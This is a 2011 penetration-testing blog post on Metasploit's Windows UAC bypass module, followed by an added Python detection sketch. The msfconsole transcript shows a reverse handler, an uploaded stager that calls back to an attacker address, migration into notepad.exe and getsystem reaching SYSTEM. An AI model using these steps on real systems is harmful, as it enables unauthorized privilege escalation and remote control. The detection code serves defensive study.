January 06, 2011

Windows UAC Bypass now in Metasploit!

Written by David Kennedy
Penetration Testing Security Testing & Analysis
The Windows UAC bypass was committed to the Metasploit Framework today. It works a bit differently from running a traditional Meterpreter script: instead of interacting with meterpreter and executing the commands from the meterpreter shell, you select it from msfconsole with use as one of the new post/ modules and point its SESSION option at an existing session. Below is how to use it:

```
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1989) at Thu Jan 06 12:40:35 -0500 2011

msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     no        Host
   RPORT    4444             no        Port
   SESSION                   yes       The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 172.16.32.128:4444 with UACBypass in effect...
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1993) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
Computer: DAVE-DEV-PC
OS      : Windows 7 (Build 7600, ).
Arch    : x64 (Current Process is WOW64)
Language: en_US
meterpreter >
```
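From the defender's side, the transcript above leaves two host artifacts worth looking for: an elevated agent executable with a randomly generated name (zuWlXDpYlOMM.exe) and a notepad.exe host process spawned by that agent for the migration step. The following is an added detection sketch, not part of the original post and not Metasploit code. It runs over a few constructed process-creation records whose field names (image, parent_image, integrity) are assumptions modelled loosely on Sysmon-style process-creation events, and the name-randomness heuristic (mixed-case alphabetic stem of at least 8 characters with high character entropy) is a constructed threshold, not a published rule.

```python
import math
import re
from collections import Counter

# Constructed sample process-creation events (not a real log export). Field names
# are assumptions; the values mirror the artifacts visible in the msfconsole
# transcript: a random-named agent running elevated, then notepad.exe as its child.
EVENTS = [
    {"pid": 2640, "image": r"C:\Users\dave\AppData\Local\Temp\zuWlXDpYlOMM.exe",
     "parent_image": r"C:\Windows\explorer.exe", "integrity": "High"},
    {"pid": 3276, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Users\dave\AppData\Local\Temp\zuWlXDpYlOMM.exe", "integrity": "High"},
    # Benign controls: a normal notepad launch and a legitimately elevated installed app.
    {"pid": 1200, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "integrity": "Medium"},
    {"pid": 1300, "image": r"C:\Program Files\Editor\editor.exe",
     "parent_image": r"C:\Windows\explorer.exe", "integrity": "High"},
]

# Directories a standard user can write to; an elevated binary living here is unusual.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.IGNORECASE)


def shannon_entropy(s):
    """Bits of entropy per character of the string s."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def basename(path):
    return path.rsplit("\\", 1)[-1]


def looks_random(name, min_len=8, min_entropy=3.0):
    """Heuristic (constructed threshold): long, purely alphabetic, mixed-case stem
    with high character entropy, like the generated stager names in the transcript."""
    stem = name.rsplit(".", 1)[0]
    if len(stem) < min_len or not stem.isalpha():
        return False
    mixed_case = stem != stem.lower() and stem != stem.upper()
    return mixed_case and shannon_entropy(stem) >= min_entropy


def find_suspicious(events):
    """Return (pid, reason) pairs: elevated random-named binaries from user-writable
    paths, and notepad.exe processes whose parent is one of those binaries."""
    findings = []
    flagged_images = set()
    for ev in events:
        if (ev["integrity"] == "High"
                and USER_WRITABLE.search(ev["image"])
                and looks_random(basename(ev["image"]))):
            findings.append((ev["pid"], "elevated random-named executable in user-writable path"))
            flagged_images.add(ev["image"].lower())
    for ev in events:
        if (ev["parent_image"].lower() in flagged_images
                and basename(ev["image"]).lower() == "notepad.exe"):
            findings.append((ev["pid"], "notepad.exe spawned by flagged process (possible migration host)"))
    return findings


if __name__ == "__main__":
    for pid, reason in find_suspicious(EVENTS):
        print(f"PID {pid}: {reason}")
```

On the constructed events this flags PID 2640 (the agent) and PID 3276 (the notepad.exe host), and leaves the two benign controls alone. In practice the entropy threshold and path list need tuning against your own baseline, and the integrity level is what matters most: a High-integrity process whose parent ran at Medium, without a consent prompt in between, is the signal a UAC bypass leaves regardless of how the binary is named.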